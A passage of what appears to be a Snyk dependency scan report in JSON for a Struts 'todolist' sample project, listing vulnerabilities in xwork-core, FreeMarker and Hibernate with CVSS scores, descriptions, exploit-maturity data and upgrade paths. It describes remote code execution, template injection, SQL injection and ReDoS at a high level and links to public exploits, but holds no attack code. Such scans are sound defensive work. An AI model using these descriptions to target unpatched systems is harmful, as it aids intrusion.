total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. 
But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. 
These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", - "epssDetails": { - "percentile": "0.99401", - "probability": "0.95900", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4465" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.751000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-20T07:45:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-06-20T07:45:43Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:51.243501Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29", - "org.apache.struts.xwork:xwork-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - 
"id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", - "title": "Command Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.3.20.2)", - "[2.3.24, 2.3.24.2)", - "[2.3.28, 2.3.28.1)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.20.2", - "2.3.24.2", - "2.3.28.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://exploit-db.com/exploits/39756", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", - "title": "NVD" - }, - { - "url": "https://www.exploit-db.com/exploits/39756", - "title": "Exploit DB" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:46:47.334921Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:02.554699Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:47.334921Z" - } - ], - "description": "## 
Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", - "epssDetails": { - "percentile": "0.99987", - "probability": "0.97524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3081" - ], - "CWE": [ - "CWE-77" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2019-07-16T11:38:49.236917Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-04-22T04:32:51Z", - "exploitDetails": { - "sources": [ - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-04-22T04:32:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:20.892839Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.3", - "org.apache.struts.xwork:xwork-core@2.3.20.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", - "title": "Insecure Defaults", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "Jasper Rosenberg" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.20.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.20.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/WW-4486", - "title": "Jira Issue" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831", - "title": "NVD" - }, - { - "url": "https://struts.apache.org/docs/s2-024.html", - "title": "Struts Security Advisory" - }, - { - "url": "http://struts.apache.org/docs/s2-024.html", - "title": "Vulnerability Summary" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:26.053752Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - 
"baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:02.093877Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:26.053752Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Insecure Defaults. The default exclude patterns (excludeParams) allow remote attackers to \"compromise internal state of an application\" via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8)\n- [GitHub Commit](https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b)\n- [Jira Issue](https://issues.apache.org/jira/browse/WW-4486)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831)\n- [Struts Security Advisory](https://struts.apache.org/docs/s2-024.html)\n- [Vulnerability Summary](http://struts.apache.org/docs/s2-024.html)\n", - "epssDetails": { - "percentile": "0.85294", - "probability": "0.01190", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-1831" - ], - "CWE": [ - "CWE-453" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2019-10-27T13:46:24.359760Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-05-11T16:51:55Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2015-05-11T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:26.053752Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.1", - "org.apache.struts.xwork:xwork-core@2.3.20.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Huawei PSIRT" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.3.24.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.24.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf", - "title": "GitHub Commit" - }, - { - "url": "https://struts.apache.org/docs/s2-027.html", - "title": "Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:46:51.429176Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:53.537810Z" - }, - { - "type": 
"secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:51.429176Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation such that the `TextParseUtil.translateVariables` method allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.\r\n\r\n**Note:**\r\n\r\nThe Struts 2 framework does not pass any user-modifiable input to this method, neither directly nor indirectly. However, a developer crafting a Struts based web application might pass unsanitized user input to `TextParseUtil.translateVariables` or ActionSupport's `getText` methods. In that case a RCE exploitation might be possible.\r\n\r\n## Workaround\r\n\r\nUsers who are unable to upgrade to the fixed version should not pass unsanitized user input to framework methods that include OGNL expression evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.24.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf)\n- [Issue](https://struts.apache.org/docs/s2-027.html)\n", - "epssDetails": { - "percentile": "0.86301", - "probability": "0.01352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3090" - ], - "CWE": [ - "CWE-20" - ], - "GHSA": [ - "GHSA-ggmp-fxfg-277r" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2023-08-01T07:46:40.919855Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-14T03:15:07Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - 
"type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2023-08-01T09:22:02.765398Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:51.429176Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.24.1", - "org.apache.struts.xwork:xwork-core@2.3.24.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGFREEMARKER-1076795", - "title": "Server-side Template Injection (SSTI)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Ackcent" - ], - "semver": { - "vulnerable": [ - "[,2.3.30)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.30" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.freemarker:freemarker", - "references": [ - { - "url": "https://github.com/apache/freemarker/pull/62", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/FREEMARKER-124", - "title": "Jira Issue" - }, - { - "url": "https://ackcent.com/in-depth-freemarker-template-injection/", - "title": "Research Blogpost" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - 
"modificationTime": "2024-03-06T14:04:29.670906Z" - } - ], - "description": "## Overview\n[org.freemarker:freemarker](https://github.com/apache/freemarker) is a \"template engine\"; a generic tool to generate text output (anything from HTML to auto generated source code) based on templates.\n\nAffected versions of this package are vulnerable to Server-side Template Injection (SSTI). By allowing user input into `java.security.ProtectionDomain.getClassLoader`, templates will get access to the java classloader. This can be further leveraged for file system access and code execution. A low-privileged user is sufficient for exploitation of this vulnerability.\n## Remediation\nUpgrade `org.freemarker:freemarker` to version 2.3.30 or higher.\n## References\n- [GitHub PR](https://github.com/apache/freemarker/pull/62)\n- [Jira Issue](https://issues.apache.org/jira/browse/FREEMARKER-124)\n- [Research Blogpost](https://ackcent.com/in-depth-freemarker-template-injection/)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.freemarker:freemarker", - "proprietary": false, - "creationTime": "2021-02-19T11:41:17.941362Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-09T11:33:30Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.freemarker", - "artifactId": "freemarker" - }, - "publicationTime": "2021-02-19T15:54:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T14:04:29.670906Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.freemarker:freemarker@2.3.19" - ], - "upgradePath": [ 
- false, - "org.apache.struts:struts2-core@2.5.25", - "org.freemarker:freemarker@2.3.30" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.freemarker:freemarker", - "version": "2.3.19" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", 
- "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and 
frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": 
"toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": 
"org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. 
